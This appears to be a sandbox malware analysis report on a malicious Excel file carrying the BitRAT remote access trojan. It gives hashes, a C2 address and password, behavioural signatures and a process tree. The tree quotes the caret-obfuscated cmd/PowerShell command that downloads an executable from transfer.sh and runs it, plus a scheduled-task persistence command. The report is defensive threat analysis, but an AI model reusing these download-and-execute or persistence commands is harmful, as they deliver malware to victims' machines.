Analysis

  • max time kernel
    43s
  • max time network
    78s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2023 15:17

General

  • Target

    Romania_Request_Imun_SRL_09_2023.xls

  • Size

    100KB

  • MD5

    968a96fab78010b987e7a0b8624d2605

  • SHA1

    1e42b6186f040b9868a978450fde05e39a267bf3

  • SHA256

    63e7d413f4653c4b84c8e4c1c4fd4516a245464b3e996aa733ce21c9c1c964b1

  • SHA512

    f953916293565e59e94f2671ef4798eff19d7ff965570d66682c38aeca273331735b638b03653960838bbfac15333364dbfb477135d298d25690b8a95fb65a75

  • SSDEEP

    3072:irxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAftJE2zuxq+fr9wBLa71ba2ryLTHeYB:kxEtjPOtioVjDGUU1qfDlavx+W2QnAVF

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Romania_Request_Imun_SRL_09_2023.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1160
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\iq5kz.exe;C:\Users\Public\iq5kz.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4744
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\iq5kz.exe;C:\Users\Public\iq5kz.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3900
        • C:\Users\Public\iq5kz.exe
          "C:\Users\Public\iq5kz.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3244
          • C:\Users\Public\iq5kz.exe
            "C:\Users\Public\iq5kz.exe"
            5⤵
            • Executes dropped EXE
            PID:4564
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 188
              6⤵
              • Program crash
              PID:3464
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c copy "C:\Users\Public\iq5kz.exe" "C:\Users\Admin\AppData\Roaming\pint\pint.exe"
            5⤵
              PID:2652
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3368
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
                6⤵
                • Creates scheduled task(s)
                PID:412
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\pint"
              5⤵
                PID:3536
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4564 -ip 4564
        1⤵
          PID:1712
        • C:\Users\Admin\AppData\Roaming\pint\pint.exe
          C:\Users\Admin\AppData\Roaming\pint\pint.exe
          1⤵
          • Executes dropped EXE
          PID:1640

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2m1kncws.zne.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\pint\pint.exe
          Filesize

          3.8MB

          MD5

          6d4c3a4ff3637ec34f820172f897d476

          SHA1

          d53fe8f0ecb0536088ec9be5247ab6627baf31cb

          SHA256

          c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

          SHA512

          1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

        • C:\Users\Admin\AppData\Roaming\pint\pint.exe
          Filesize

          3.8MB

          MD5

          6d4c3a4ff3637ec34f820172f897d476

          SHA1

          d53fe8f0ecb0536088ec9be5247ab6627baf31cb

          SHA256

          c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

          SHA512

          1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

        • C:\Users\Admin\AppData\Roaming\pint\pint.exe
          Filesize

          3.8MB

          MD5

          6d4c3a4ff3637ec34f820172f897d476

          SHA1

          d53fe8f0ecb0536088ec9be5247ab6627baf31cb

          SHA256

          c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

          SHA512

          1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

        • C:\Users\Public\iq5kz.exe
          Filesize

          3.8MB

          MD5

          6d4c3a4ff3637ec34f820172f897d476

          SHA1

          d53fe8f0ecb0536088ec9be5247ab6627baf31cb

          SHA256

          c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

          SHA512

          1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

        • C:\Users\Public\iq5kz.exe
          Filesize

          3.8MB

          MD5

          6d4c3a4ff3637ec34f820172f897d476

          SHA1

          d53fe8f0ecb0536088ec9be5247ab6627baf31cb

          SHA256

          c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

          SHA512

          1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

        • C:\Users\Public\iq5kz.exe
          Filesize

          3.8MB

          MD5

          6d4c3a4ff3637ec34f820172f897d476

          SHA1

          d53fe8f0ecb0536088ec9be5247ab6627baf31cb

          SHA256

          c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

          SHA512

          1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

        • memory/1160-13-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-46-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-8-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-10-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-11-0x00007FFEA1A80000-0x00007FFEA1A90000-memory.dmp
          Filesize

          64KB

        • memory/1160-12-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-1-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-14-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-15-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-16-0x00007FFEA1A80000-0x00007FFEA1A90000-memory.dmp
          Filesize

          64KB

        • memory/1160-22-0x000001876D5E0000-0x000001876D7E0000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-25-0x000001876D5E0000-0x000001876D7E0000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-26-0x000001876D5E0000-0x000001876D7E0000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-0-0x00007FFEA4070000-0x00007FFEA4080000-memory.dmp
          Filesize

          64KB

        • memory/1160-4-0x00007FFEA4070000-0x00007FFEA4080000-memory.dmp
          Filesize

          64KB

        • memory/1160-2-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-3-0x00007FFEA4070000-0x00007FFEA4080000-memory.dmp
          Filesize

          64KB

        • memory/1160-40-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-5-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-42-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-43-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-44-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-45-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-9-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-47-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-48-0x00007FFEE3FF0000-0x00007FFEE41E5000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-52-0x000001876D5E0000-0x000001876D7E0000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-53-0x000001876D5E0000-0x000001876D7E0000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-54-0x000001876D5E0000-0x000001876D7E0000-memory.dmp
          Filesize

          2.0MB

        • memory/1160-6-0x00007FFEA4070000-0x00007FFEA4080000-memory.dmp
          Filesize

          64KB

        • memory/1160-7-0x00007FFEA4070000-0x00007FFEA4080000-memory.dmp
          Filesize

          64KB

        • memory/1640-90-0x0000000075250000-0x0000000075A00000-memory.dmp
          Filesize

          7.7MB

        • memory/3244-71-0x0000000006170000-0x0000000006714000-memory.dmp
          Filesize

          5.6MB

        • memory/3244-84-0x0000000075250000-0x0000000075A00000-memory.dmp
          Filesize

          7.7MB

        • memory/3244-72-0x0000000005BB0000-0x0000000005BC0000-memory.dmp
          Filesize

          64KB

        • memory/3244-70-0x0000000000D30000-0x0000000001108000-memory.dmp
          Filesize

          3.8MB

        • memory/3244-69-0x0000000075250000-0x0000000075A00000-memory.dmp
          Filesize

          7.7MB

        • memory/3900-41-0x000001E61DCC0000-0x000001E61DCD0000-memory.dmp
          Filesize

          64KB

        • memory/3900-68-0x00007FFEBCD50000-0x00007FFEBD811000-memory.dmp
          Filesize

          10.8MB

        • memory/3900-59-0x000001E61DCC0000-0x000001E61DCD0000-memory.dmp
          Filesize

          64KB

        • memory/3900-55-0x00007FFEBCD50000-0x00007FFEBD811000-memory.dmp
          Filesize

          10.8MB

        • memory/3900-39-0x000001E61DCC0000-0x000001E61DCD0000-memory.dmp
          Filesize

          64KB

        • memory/3900-38-0x00007FFEBCD50000-0x00007FFEBD811000-memory.dmp
          Filesize

          10.8MB

        • memory/3900-33-0x000001E61DAF0000-0x000001E61DB12000-memory.dmp
          Filesize

          136KB

        • memory/3900-58-0x000001E61DCC0000-0x000001E61DCD0000-memory.dmp
          Filesize

          64KB

        • memory/4564-75-0x0000000000F20000-0x00000000012EE000-memory.dmp
          Filesize

          3.8MB

        • memory/4564-80-0x0000000000F20000-0x00000000012EE000-memory.dmp
          Filesize

          3.8MB

        • memory/4564-85-0x0000000000F20000-0x00000000012EE000-memory.dmp
          Filesize

          3.8MB